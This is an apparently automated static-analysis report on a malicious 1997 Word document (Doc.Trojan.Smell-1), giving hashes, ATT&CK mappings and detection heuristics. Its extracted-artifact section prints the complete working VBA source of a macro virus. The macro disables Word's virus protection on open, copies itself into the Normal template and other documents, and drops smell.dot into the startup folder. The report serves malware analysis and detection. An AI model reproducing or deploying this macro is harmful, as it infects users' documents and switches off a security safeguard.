Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c4718b025b074b4…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c65bbb8261cc8ece77cd4b3471f9df82
SHA-1: 6991fcd177ca4cbd8601f908a27aaee07cf98c4e
SHA-256: 9c4718b025b074b401cb8207ec16333ca69376d1479af0d1195fd55c731d782a
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which runs automatically when the document is opened and is a common initial-execution technique. The macro copies its own code into the Normal template and into the active document, and saves a copy of the document as 'smell.dot' in the Word startup path, behaviour the report classifies as downloader or dropper functionality; no network activity appears in the extracted source, so the observed behaviour is self-propagation between documents rather than a download. The 'smell.dot' file name and the 'Smell' module name referenced in the code identify a specific, although otherwise unknown, malware component.

Heuristics 3

  • ClamAV: Doc.Trojan.Smell-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Smell-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3271 bytes
SHA-256: c3b438c7092de927c03be36e8df4a004d9f9b235dc8f8c2604df120546837425
Detection: ClamAV: Doc.Trojan.Smell-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public WhoAmI As String
Public SmellDot As Boolean
Public NormInstalled As Boolean
Public DocInstalled As Boolean
Public NormReadOnly As Boolean
Public DocThere As Boolean

Private Sub Document_Open()
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0
Call ID_Status
Call Install_Status
If WhoAmI = "document" Then Call DocCode
If WhoAmI = "normal" Then Call NormCode
If WhoAmI = "smell" Then Call SmellCode
End Sub

Function ID_Status()
On Error Resume Next

If MacroContainer = NormalTemplate Then
    WhoAmI = "normal"
    GoTo checkout
End If
If MacroContainer = ActiveDocument Then WhoAmI = "document"
If MacroContainer = "smell.dot" Then WhoAmI = "smell"
checkout:
End Function

Function Install_Status()
On Error Resume Next
If Dir(Application.StartupPath + "\smell.dot") = "smell.dot" Then SmellDot = True
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Smell" Then DocInstalled = True
    Next i
    For i = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(i).Name = "Smell" Then NormInstalled = True
    Next i
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or _
GetAttr(NormalTemplate.FullName) = vbReadOnly Then NormReadOnly = True
End Function

Function DocCode()
On Error Resume Next
If NormInstalled = False And NormReadOnly = False Then
    NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
End If
If SmellDot = False Then
    ActiveDocument.SaveAs FileName:=Application.StartupPath + "\smell.dot", _
    FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Function

Function NormCode()
On Error Resume Next
Call Check_For_Doc
If DocInstalled = False And DocThere = True Then
   ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
   ActiveDocument.Save
End If
If SmellDot = False And DocThere = True Then
   ActiveDocument.SaveAs FileName:=Application.StartupPath + "\smell.dot", _
   FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Function

Function Check_For_Doc()
On Error GoTo docek
If ActiveDocument.Name <> "" Then
    DocThere = True
End If
GoTo over
docek:
DocThere = False
over:
End Function

Function SmellCode()
On Error Resume Next
If NormInstalled = False And NormReadOnly = False Then
    NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
    NormalTemplate.Save
End If
If DocInstalled = False Then
    ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
    ActiveDocument.Save
End If
End Function